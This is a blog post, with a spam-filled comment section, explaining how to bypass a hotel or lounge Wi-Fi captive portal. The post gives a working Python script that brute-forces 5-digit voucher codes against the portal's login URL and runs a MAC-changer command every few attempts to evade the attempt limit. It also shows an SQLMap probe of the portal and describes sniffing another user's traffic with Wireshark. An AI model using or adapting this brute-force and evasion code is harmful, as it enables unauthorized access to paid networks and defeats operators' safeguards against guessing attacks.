bypass-captive-portal

Bypass Captive Portal logins on Windows using Python Scripting

Stuck in a lounge, hostel or hotel, but do not have access to Premium Wifi ? A little patience & bit of creativity in Python skillset, can help you bypass the captive portal & open the doors of Internet for you.

I will keep this blog very short, and put you straight into the scenario. Right said Fred, I had a limited access to Internet where I have to authenticate via a Captive Portal login, the access code used for this login is a 5 digit numeric code (set by Admin, most network gears keep either 4 or 5 digit codes).

However the snag is, you are limited with a maximum number of attempts you can make in a day. So it becomes hard to crack, if you thought running a loop from 0 to 99999 was the prime solution (which is basically what we will do). The challenge here is, how do we unblock the max limit of attempts which is stored as session variable as part of administrator’s server side scripting.

Let’s quickly, scribble with the client side scripting. This is where you will understand, how the logic should flow in your Python Script.

bypass-captive-portal

As you see, the wrapper function in this JS validates the POST request

Some captive portals might encrypt the HTML source code. Try being little intuitive

If you want to possibly explore the vulnerabilities to bypass captive portal, try performing this optional step through SQLMap utility

(Optional): Lets do a small analysis on the POST request, being sent to the Authentication Server. (SQLMAP is a popular penetration testing tool used in finding SQL DB flaws, you may use cygwin if you are a Windows user like me)

Results of this step, allows you to program your hack in many other ways

python sqlmap.py -u “https://hotspot.XXXXXXXXX.com/auth-voucher/login.php?voucher=96744” –identify-waf -v 3

Okay, for me. This optional step didn’t yield much insights. The Radius server used for this captive portal is much strong in protecting the database layer. I even wireshark(ed) the TCP layer before to find what possible inputs are being fed. That’s how I got the pattern of my access code, which was a plain 5 digit numeric code. This was being fed in packets, which wireshark sniffed from another user’s machine (IP address) registered in the same network (Warning: Do not use someone else’s access code for your leisure. Our approach is to find, an non-utilized access code only)

In the first 10 minutes… This is what I got to know !

  • Access code is 5 digit numeric
  • Server registers only 1 device per access code
  • The maximum attempts allowed is 3 times

We are almost near to writing our good piece of code with a bit of analogy from the results obtained so far. But wait, how do we overcome the max attempts limitations set by the WiFi Operator ? Here’s a short answer to that.

Its mainly done to prevent people from randomly typing access code or passwords on an action form. Or in a technical viewpoint, blocking bruteforce attacks on HTML forms from humans & bots.

And how to they know, if its the same person ? Via the IP or MAC Address or combination of both simply. Or at least most application servers eg. Oracle APEX or PHP+MySQL having such backend infrastructure rely on session variables set by remote servers. So what if we could change, our MAC Address for every POST request being sent to server ? Yes we can, but NO we aren’t going to change Cookie Headers for this as we know the session variables are being set by server as soon we register our device into WiFi network and landing on the Captive Login Portal page.

That literally means, we have to be one step ahead our Windows Network Discovery Mechanism. There are hundreds of way doing it, but I choose to opt for something which can be executed via a Shell (as a Windows Batch Program) and not break the Windows registry. Hence i made use of Technitium MAC Changer

bypass-captive-portal
Or we can execute the same operation through Command Prompt below

Steps to perform

  • Write a Python dictionary with numeric codes used as inputs into a file
  • Define your flags, for the response received eg. in my case, CE – Code Expired, IO – Internet Open, MD – Multiple Device, IVC – Invalid Voucher Code
  • Run your function with range of numbers as input variables, where for after every 3rd Iteration, the TMAC batch command would get executed causing the MAC address to reset thus giving you a new IP address in the network. Make sure to give a sleep time of 1-5 Seconds
  • At this stage, you will eliminate the maximum attempt limitation
  • Further in the code, when the if-else command validates to desired response code from POST request. You will be connected to the Internet & bypass captive portal

The Python Script

import requests
import os
import time
from datetime import datetime
import random
import string
import math

def write_dic(d,a,b):
    f=open("I:/RVD/"+str(a)+"__"+str(b)+".csv","a+",encoding="utf-8")
    keys=d.keys()
    for k in keys:
        f.write(str(k)+','+str(d[k])+','+str(datetime.now()))
        f.write("\n")
    f.close()
    
def run_rvwifi(a,b):
    v_ctr = 0
    v_dict = {}
    ivc = 'invalid'
    ce = 'expired'
    io = 'inet'
    md = 'max'
    start_time = time.time()
    os.system('cmd /k "cd G:\Program Files (x86)\Technitium\TMACv6.0 & tmac -n Wireless Network Connection -r02 -h -s -re -en & exit"')
    print("Starting")
    time.sleep(5)
    for i in range(a,b):
        #voucher = random.randint(90000,91000) 
        voucher=i
            
        if(v_ctr<4):
            page = ''
            while page == '':
                try:
                   response = requests.get("http://hotspot.XXXXXXXX.com/auth-voucher/login.php?voucher="+str(voucher))
                   break
                except requests.exceptions.ConnectionError:
                    print(response.status_code)
                    print("connect refused")
                    time.sleep(1)
                    continue
            rt = response.text.lower()
            if(io in rt):
                print('IO'+str(voucher))
                v_dict[voucher] = 'IO'
                v_ctr = v_ctr+1
            elif(ce in rt):
                print('CE'+str(voucher))
                v_dict[voucher] = 'CE'
                v_ctr = v_ctr+1    
            elif(ivc in rt):
                #print('IVC'+str(voucher))
                v_dict[voucher] = 'IVC'
                v_ctr = v_ctr+1
            elif(md in rt):
                print('MD'+str(voucher))
                v_dict[voucher] = 'MD'
                v_ctr = v_ctr+1
            elif('0' in rt):
                print('0'+str(voucher))
                v_dict[voucher] = '0'
                v_ctr = v_ctr+1
            else:
                v_dict[voucher]= rt
                print('UNKNOWN'+str(voucher))
                print('some code found: '+ str(voucher) + ' ' + str(rt))
                v_ctr = v_ctr+1
                break
        elif(v_ctr==6):
            os.system('cmd /k "cd G:\Program Files (x86)\Technitium\TMACv6.0 & tmac -n Wireless Network Connection -r02 -h -s -re -en & exit"')
            v_ctr=1
            print("sleeping for code "+str(voucher))
            time.sleep(20)
            rage = ''
            while rage == '':
                try:
                    response = requests.get("http://hotspot.XXXXXXXX.com/auth-voucher/login.php?voucher="+str(voucher))
                    break
                except requests.exceptions.ConnectionError:
                    print(response.status_code)
                    print("connect refused")
                    time.sleep(1)
                    continue
            rt = response.text.lower()
            if(io in rt):
                print('IO'+str(voucher))
                v_dict[voucher] = 'IO'
                v_ctr = v_ctr+1
            elif(ce in rt):
                print('CE'+str(voucher))
                v_dict[voucher] = 'CE'
                v_ctr = v_ctr+1    
            elif(ivc in rt):
                #print('IVC'+str(voucher))
                v_dict[voucher] = 'IVC'
                v_ctr = v_ctr+1
            elif(md in rt):
                print('MD'+str(voucher))
                v_dict[voucher] = 'MD'
                v_ctr = v_ctr+1
            elif('0' in rt):
                print('0'+str(voucher))
                v_dict[voucher] = '0'
                v_ctr = v_ctr+1    
            else:
                v_dict[voucher]= rt
                print('UNKNOWN'+str(voucher))
                print('some code found: '+ str(voucher) + ' ' + str(rt))
                v_ctr = v_ctr+1
                break
            
    print("Done with execution")
    print("Total time taken  for "+str(b-a)+" records is "+str(time.time() -start_time))
    write_dic(v_dict,a,b)

run_rvwifi(90000,99999)

Below is the csv file archived in our disk, you can check the list of numeric codes executed by our script.

bypass-captive-portal

Here we are, connected to the Internet at the 22nd iteration of loop, the value being 99660. All it took was to device a quick way to disable the max attempt limitation, and make use of tools like Wireshark, Technitium & SQLmap to analyse the backend for vulnerabilities. This gives you enough takeways, on how to write your own program to overcome the limitations. Feel free to share your thoughts & opinions in the comments below.

Read also – Shanghai Drive

37 Comments

Join the discussion and tell us your opinion.

A Fanreply
February 23, 2021 at 1:21 am

Amazing blog! Do you have any suggestions for aspiring writers?
I’m hoping to start my own blog soon but I’m a little lost
on everything. Would you advise starting with a free platform like WordPress or go for a
paid option? There are so many options out there that I’m totally confused ..
Any tips? Bless you!

Marthareply
February 23, 2021 at 8:26 am

You could definitely see your enthusiasm in the work you write.
The sector hopes for even more passionate writers like you who are not afraid to say how they believe.
At all times go after your heart.

Tweetphilereply
February 23, 2021 at 8:10 pm

Howdy! Do you use Twitter? I’d like to follow you if that would be ok.
I’m absolutely enjoying your blog and look forward to new posts.

Kaitlyreply
February 24, 2021 at 1:16 pm

Howdy fantastic website! Does running a blog like this require a lot of work?

I have no expertise in coding however I had been hoping
to start my own blog soon. Anyways, if you have any recommendations or tips for new blog owners please share.

I know this is off topic however I just wanted to ask.
Kudos!

Jacobreply
February 25, 2021 at 12:50 pm

I’m really impressed with your writing skills and also with the
layout on your blog. Is this a paid theme or did you customize it yourself?
Anyway keep up the nice quality writing, it is rare to see a
nice blog like this one today.

Myrtlereply
March 6, 2021 at 9:38 am

Great article! We are linking to this particularly great content on our site. Myrtle Lancelot Jacie

Yedek Parça İmalatlarıreply
March 19, 2021 at 12:18 pm

I am sure this paragraph has touched all the internet users, its really really pleasant article on building up new web site.

buy cbd gummiesreply
March 20, 2021 at 6:38 am

What’s up everybody, here every one is sharing these kinds of know-how,
so it’s fastidious to read this weblog, and I
used to pay a quick visit this web site every
day.

Feel free to visit my webpage :: buy cbd gummies

buy cbd gummiesreply
March 21, 2021 at 5:42 pm

I’ve been exploring for a little bit for any high
quality articles or weblog posts in this kind
of area . Exploring in Yahoo I ultimately stumbled upon this site.

Reading this info So i am satisfied to show that I’ve a
very good uncanny feeling I came upon exactly what I needed.
I such a lot unquestionably will make certain to do not omit this web site and provides it a glance regularly.

Check out my page; buy cbd gummies

best CBD gummiesreply
March 21, 2021 at 9:26 pm

My partner and I stumbled over here from a different page and thought I might
as well check things out. I like what I see so now i am
following you. Look forward to exploring your web page for a second time.

Also visit my page; best CBD gummies

Valenciareply
March 22, 2021 at 9:40 am

I read this post completely regarding the difference
of most recent and earlier technologies,
it’s awesome article.

CBD gummies for painreply
March 24, 2021 at 11:07 pm

Useful info. Fortunate me I discovered your website by accident, and I’m shocked why this
accident did not happened earlier! I bookmarked it.

Feel free to visit my website … CBD gummies for pain

CBD gummies for sleepreply
March 24, 2021 at 11:29 pm

I am sure this article has touched all the
internet visitors, its really really good post on building up
new website.

Here is my homepage; CBD gummies for sleep

delta 8 thc near mereply
April 8, 2021 at 4:31 am

Hello There. I found your blog using msn. This is a really well written article.
I will be sure to bookmark it and return to read more of your useful info.
Thanks for the post. I will certainly comeback.

Feel free to visit my webpage; delta 8 thc near me

best delta 8 thcreply
April 9, 2021 at 10:11 am

Quality posts is the secret to be a focus for
the visitors to pay a quick visit the site, that’s what this web page is providing.

Feel free to visit my site :: best delta 8 thc

CBD gummies for sleepreply
April 14, 2021 at 12:02 pm

Have you ever thought about including a little bit more than just your articles?
I mean, what you say is valuable and all. However think of if you added some great pictures or video clips to
give your posts more, “pop”! Your content is excellent but with images and video clips, this blog could certainly be one of the very best in its field.
Excellent blog!

Visit my homepage … CBD gummies for sleep

best CBDreply
April 15, 2021 at 11:49 pm

Unquestionably believe that which you said. Your favorite reason seemed to be on the
web the easiest thing to be aware of. I say to you,
I certainly get annoyed while people think about worries that they
just don’t know about. You managed to hit the nail upon the top as well as defined out
the whole thing without having side effect , people can take a signal.
Will likely be back to get more. Thanks

Review my webpage; best CBD

best delta 8reply
April 17, 2021 at 5:58 am

I am really enjoying the theme/design of your blog. Do you ever run into any browser compatibility problems?

A few of my blog visitors have complained about my blog not operating correctly in Explorer but looks great in Chrome.
Do you have any suggestions to help fix this issue?

Look into my blog post :: best delta 8

best delta 8 cartsreply
April 17, 2021 at 6:42 am

I really like it whenever people come together and share opinions.

Great site, continue the good work!

Feel free to visit my homepage :: best delta 8 carts

buy cbdreply
April 17, 2021 at 6:41 pm

Asking questions are in fact pleasant thing if you are
not understanding something entirely, however this paragraph presents pleasant understanding
even.

Visit my homepage: buy cbd

cbdreply
April 20, 2021 at 8:14 pm

This article presents clear idea for the new people of blogging, that genuinely how to do blogging.

Feel free to surf to my website – cbd

buy instagram followersreply
April 24, 2021 at 2:53 am

Touche. Outstanding arguments. Keep up the amazing work.

Area 52 Delta 8 THCreply
April 25, 2021 at 6:32 am

Do you mind if I quote a couple of your articles as long
as I provide credit and sources back to your weblog?

My blog is in the exact same niche as yours and my visitors would really benefit
from a lot of the information you provide here. Please let
me know if this okay with you. Many thanks!

Check out my blog Area 52 Delta 8 THC

buy instagram followersreply
April 30, 2021 at 10:19 am

If you would like to obtain a good deal from this article then you have to apply such techniques to your won web site.

P.S. If you have a minute, would love your feedback on my new website
re-design. You can find it by searching for «royal cbd» — no sweat if you can’t.

Keep up the good work!

my blog post; buy instagram followers

gold beereply
May 1, 2021 at 9:37 am

Right away I am going to do my breakfast, once
having my breakfast coming again to read other news.

My website – gold bee

gold beereply
May 1, 2021 at 9:46 am

If some one needs to be updated with hottest technologies therefore he must be go to see this
web page and be up to date everyday.

Also visit my homepage gold bee

slot onlinereply
June 3, 2021 at 2:50 am

What’s up Dear, are you truly visiting this web page
on a regular basis, if so after that you will definitely get nice knowledge.

Here is my web page – slot online

best thc gummiesreply
June 3, 2021 at 4:29 am

Good post! We are linking to this great content on our site.
Keep up the good writing.

Here is my web-site – best thc gummies

Best Delta 8 THC Gummiesreply
June 3, 2021 at 8:26 pm

obviously like your web-site but you need to check the spelling on several of your posts.

Several of them are rife with spelling problems and I in finding it very bothersome to
tell the reality however I will definitely come again again.

Feel free to visit my web-site: Best Delta 8 THC Gummies

delta 8 gummies near mereply
June 3, 2021 at 9:23 pm

Thanks to my father who stated to me regarding this blog, this webpage is truly remarkable.

Visit my webpage; delta 8 gummies near me

minecraft-servers-listreply
June 18, 2021 at 10:17 pm

Yoour pkace iis valueble for me. Thanks!…

delta 8 THC gummiesreply
June 20, 2021 at 10:57 pm

If some one needs expert view about blogging then i suggest him/her to pay a visit this webpage, Keep up the fastidious work.

My web-site – delta 8 THC gummies

www.heraldnet.comreply
June 21, 2021 at 5:17 am

Hi there everyone, it’s my first visit at this web site, and post is actually fruitful in support of
me, keep up posting these posts.

my web-site: purchase Instagram followers (http://www.heraldnet.com)

delta 8reply
June 21, 2021 at 8:37 am

An impressive share! I have just forwarded this onto a coworker who was doing a little research on this.
And he in fact bought me dinner due to the fact that I stumbled upon it for him…

lol. So let me reword this…. Thank YOU for the meal!!
But yeah, thanks for spending the time to talk about this subject
here on your web page.

Also visit my web-site :: delta 8

buy followersreply
June 21, 2021 at 8:15 pm

Thank you for sharing your info. I really appreciate your efforts and I will be
waiting for your next post thanks once again.

My page … buy followers

https://www.usmagazine.com/reply
June 22, 2021 at 2:26 am

Why viewers still use to read news papers when in this
technological world all is accessible on web?

Also visit my webpage: buy real Instagram likes (https://www.usmagazine.com/)

weed gummiesreply
June 24, 2021 at 3:20 pm

I visited several sites however the audio feature for audio
songs present at this website is really wonderful.

Also visit my web site: weed gummies

Leave a reply